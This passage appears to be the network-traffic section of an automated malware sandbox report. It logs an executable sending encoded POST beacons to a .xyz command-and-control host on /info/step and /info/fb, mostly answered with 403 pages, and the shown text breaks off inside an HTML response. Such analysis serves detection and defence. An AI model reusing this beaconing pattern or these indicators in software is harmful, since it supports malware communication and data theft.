64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49722	198.54.117.244	80	C:\Users\user\Desktop\aOn5CfTiwS.exe

Timestamp	kBytes transferred	Direction	Data
Jan 30, 2021 18:07:07.685383081 CET	135	OUT	POST /info/step HTTP/1.1 Host: 1a469593c1fe15dc.xyz accept: / Content-Type:application/x-www-form-urlencoded User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Content-Length: 93 Data Raw: 69 6e 66 6f 3d 61 39 50 64 5a 6c 75 6d 52 4b 41 65 70 79 58 4d 4a 5a 44 66 44 52 56 58 71 54 4d 58 52 56 67 33 48 4d 63 75 59 7a 58 46 45 4f 53 36 68 66 54 6e 4a 65 45 6e 46 59 70 49 43 4a 4f 32 61 4e 77 42 69 55 44 42 49 69 5f 77 7a 37 6d 63 6b 54 35 58 45 37 55 39 42 41 7e 7e Data Ascii: info=a9PdZlumRKAepyXMJZDfDRVXqTMXRVg3HMcuYzXFEOS6hfTnJeEnFYpICJO2aNwBiUDBIi_wz7mckT5XE7U9BA~~
Jan 30, 2021 18:07:07.880098104 CET	139	IN	HTTP/1.1 403 Forbidden Date: Sat, 30 Jan 2021 17:07:07 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Server: namecheap-nginx Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.3	49724	198.54.117.244	80	C:\Users\user\Desktop\aOn5CfTiwS.exe

Timestamp	kBytes transferred	Direction	Data
Jan 30, 2021 18:07:08.394299984 CET	145	OUT	POST /info/step HTTP/1.1 Host: 1a469593c1fe15dc.xyz accept: / Content-Type:application/x-www-form-urlencoded User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Content-Length: 81 Data Raw: 69 6e 66 6f 3d 61 39 50 64 5a 6c 75 6d 52 4b 41 65 70 79 58 4d 4a 5a 44 66 44 52 56 58 71 54 4d 58 52 56 67 33 48 4d 63 75 59 7a 58 46 45 4f 53 36 68 66 54 6e 4a 65 45 6e 46 54 50 7a 64 36 6f 6d 4e 61 61 45 63 53 7a 4f 32 5a 77 4a 4e 70 6f 7e Data Ascii: info=a9PdZlumRKAepyXMJZDfDRVXqTMXRVg3HMcuYzXFEOS6hfTnJeEnFTPzd6omNaaEcSzO2ZwJNpo~
Jan 30, 2021 18:07:08.591455936 CET	151	IN	HTTP/1.1 403 Forbidden Date: Sat, 30 Jan 2021 17:07:08 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Server: namecheap-nginx Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.3	49725	198.54.117.244	80	C:\Users\user\Desktop\aOn5CfTiwS.exe

Timestamp	kBytes transferred	Direction	Data
Jan 30, 2021 18:07:13.813857079 CET	160	OUT	POST /info/fb HTTP/1.1 Host: 1a469593c1fe15dc.xyz accept: / Content-Type:application/x-www-form-urlencoded User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Content-Length: 337 Data Raw: 69 6e 66 6f 3d 69 38 39 36 50 2d 69 71 67 65 32 52 43 71 31 4d 63 57 4e 79 58 6e 64 37 52 69 4a 43 6d 54 53 56 78 50 68 63 61 53 66 6d 41 53 35 49 73 4b 46 36 37 7a 4b 6e 71 6a 58 46 6d 75 4c 57 49 2d 6a 57 4f 32 33 6e 44 37 2d 56 32 59 50 46 78 7a 5f 68 7a 4f 76 64 58 56 64 50 58 75 59 49 55 38 7a 65 51 6d 6d 43 46 4c 49 4e 39 4c 73 4f 47 6e 58 66 6a 46 37 62 69 6d 54 36 73 39 35 41 43 39 42 2d 76 61 64 52 4d 71 69 55 33 31 43 2d 47 4a 6d 6b 66 39 6f 51 59 65 35 72 55 44 61 67 4c 67 50 43 6c 71 2d 76 74 73 62 6d 6d 69 34 70 54 49 43 61 51 6e 31 34 41 35 41 65 58 71 30 6c 6a 76 63 69 63 69 47 56 43 5a 43 5f 76 4c 6d 6a 68 70 7a 53 52 5f 4a 31 56 62 6c 75 43 6a 51 7a 4a 51 51 45 74 37 33 62 31 44 37 46 65 61 6d 30 47 37 76 41 42 67 46 6b 6f 7a 47 37 31 56 53 77 32 31 31 47 47 35 30 68 42 51 78 72 5a 4e 68 4d 63 4a 59 4b 4f 48 72 50 37 2d 38 59 35 31 78 67 6c 48 56 50 30 6b 53 63 31 75 46 32 36 35 46 66 42 76 6b 75 75 34 7a 5f 75 6d 4d 6a 72 49 78 7a 74 4e 38 62 36 78 44 55 77 74 41 39 59 67 45 7e Data Ascii: info=i896P-iqge2RCq1McWNyXnd7RiJCmTSVxPhcaSfmAS5IsKF67zKnqjXFmuLWI-jWO23nD7-V2YPFxz_hzOvdXVdPXuYIU8zeQmmCFLIN9LsOGnXfjF7bimT6s95AC9B-vadRMqiU31C-GJmkf9oQYe5rUDagLgPClq-vtsbmmi4pTICaQn14A5AeXq0ljvciciGVCZC_vLmjhpzSR_J1VbluCjQzJQQEt73b1D7Feam0G7vABgFkozG71VSw211GG50hBQxrZNhMcJYKOHrP7-8Y51xglHVP0kSc1uF265FfBvkuu4z_umMjrIxztN8b6xDUwtA9YgE~
Jan 30, 2021 18:07:14.008676052 CET	160	IN	HTTP/1.1 403 Forbidden Date: Sat, 30 Jan 2021 17:07:13 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Server: namecheap-nginx Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.3	49726	198.54.117.244	80	C:\Users\user\Desktop\aOn5CfTiwS.exe

Timestamp	kBytes transferred	Direction	Data
Jan 30, 2021 18:07:14.412805080 CET	161	OUT	POST /info/step HTTP/1.1 Host: 1a469593c1fe15dc.xyz accept: / Content-Type:application/x-www-form-urlencoded User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Content-Length: 93 Data Raw: 69 6e 66 6f 3d 61 39 50 64 5a 6c 75 6d 52 4b 41 65 70 79 58 4d 4a 5a 44 66 44 52 56 58 71 54 4d 58 52 56 67 33 48 4d 63 75 59 7a 58 46 45 4f 53 36 68 66 54 6e 4a 65 45 6e 46 54 36 36 7a 75 49 6b 46 78 34 51 48 5a 5a 51 78 39 65 4e 79 4f 75 39 63 6f 44 2d 69 4f 65 62 36 51 7e 7e Data Ascii: info=a9PdZlumRKAepyXMJZDfDRVXqTMXRVg3HMcuYzXFEOS6hfTnJeEnFT66zuIkFx4QHZZQx9eNyOu9coD-iOeb6Q~~
Jan 30, 2021 18:07:14.619900942 CET	162	IN	HTTP/1.1 403 Forbidden Date: Sat, 30 Jan 2021 17:07:14 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Server: namecheap-nginx Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.3	49727	198.54.117.244	80	C:\Users\user\Desktop\aOn5CfTiwS.exe

Timestamp	kBytes transferred	Direction	Data
Jan 30, 2021 18:07:14.949810982 CET	163	OUT	POST /info/step HTTP/1.1 Host: 1a469593c1fe15dc.xyz accept: / Content-Type:application/x-www-form-urlencoded User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Content-Length: 81 Data Raw: 69 6e 66 6f 3d 61 39 50 64 5a 6c 75 6d 52 4b 41 65 70 79 58 4d 4a 5a 44 66 44 52 56 58 71 54 4d 58 52 56 67 33 48 4d 63 75 59 7a 58 46 45 4f 53 36 68 66 54 6e 4a 65 45 6e 46 55 73 43 66 62 73 30 45 71 51 42 56 37 32 4b 6f 78 6d 45 42 71 55 7e Data Ascii: info=a9PdZlumRKAepyXMJZDfDRVXqTMXRVg3HMcuYzXFEOS6hfTnJeEnFUsCfbs0EqQBV72KoxmEBqU~
Jan 30, 2021 18:07:15.144808054 CET	164	IN	HTTP/1.1 403 Forbidden Date: Sat, 30 Jan 2021 17:07:15 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Server: namecheap-nginx Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.3	49728	198.54.117.244	80	C:\Users\user\Desktop\aOn5CfTiwS.exe

Timestamp	kBytes transferred	Direction	Data
Jan 30, 2021 18:07:21.187683105 CET	165	OUT	GET /info/dd HTTP/1.1 Host: 1a469593c1fe15dc.xyz accept: / User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Jan 30, 2021 18:07:21.382164001 CET	166	IN	HTTP/1.1 200 OK Date: Sat, 30 Jan 2021 17:07:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Set-Cookie: SessionId=6ec67585f91d477dbcf57a8802bef742; domain=.www.namecheap.com; path=/; httponly Set-Cookie: x-ncpl-csrf=925a5aa42aa64fbab886dac2e496e6ce; domain=.www.namecheap.com; path=/; secure; samesite=none X-Proxy-Cache: HIT Server: namecheap-nginx Data Raw: 65 38 39 0d 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 52 65 67 69 73 74 72 61 6e 74 20 57 48 4f 49 53 20 63 6f 6e 74 61 63 74 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 76 65 72 69 66 69 63 61 74 69 6f 6e 20 7c 20 4e 61 6d 65 63 68 65 61 70 2e 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6e 61 6d 65 63 68 65 61 70 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 69 6d 67 2f 6e 63 2d 69 63 6f 6e 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 6e 63 5f 6d 61 69 6e 4c 65 67 61 63 79 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 75 6e 63 74 69 6f 6e 20 6e 28 72 29 7b 69 66 28 65 5b 72 5d 29 72 65 74 75 72 6e 20 65 5b 72 5d 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 69 3d 65 5b 72 5d 3d 7b 69 3a 72 2c 6c 3a 21 31 2c 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 72 65 74 75 72 6e 20 74 5b 72 5d 2e 63 61 6c 6c 28 69 2e 65 78 70 6f 72 74 73 2c 69 2c 69 2e 65 78 70 6f 72 74 73 2c 6e 29 2c 69 2e 6c 3d 21 30 2c 69 2e 65 78 70 6f 72 74 73 7d 76 61 72 20 65 3d 7b 7d 3b 72 65 74 75 72 6e 20 6e 2e 6d 3d 74 2c 6e 2e 63 3d 65 2c 6e 2e 64 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 6e 2e 6f 28 74 2c 65 29 7c 7c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 65 2c 7b 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 31 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 67 65 74 3a 72 7d 29 7d 2c 6e 2e 6e 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 26 26 74 2e 5f 5f 65 73 4d 6f 64 75 6c 65 3f 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 2e 64 65 66 61 75 6c 74 7d 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 7d 3b 72 65 74 75 72 6e 20 6e 2e 64 28 65 2c 22 61 22 2c 65 29 2c 65 7d 2c 6e 2e 6f 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 74 2c 6e 29 7d 2c 6e 2e 70 3d 22 22 2c 6e 28 6e 2e 73 3d 32 37 33 29 7d 28 5b 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 2c 65 29 7b 76 61 72 20 72 3d 65 28 33 29 2c 69 3d 65 28 31 35 29 2c 6f 3d 65 28 31 30 29 2c 61 3d 65 28 31 31 29 2c 75 3d 65 28 31 36 29 2c 73 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 2c 65 29 7b 76 61 72 Data Ascii: e89<html><head lang="en"><meta 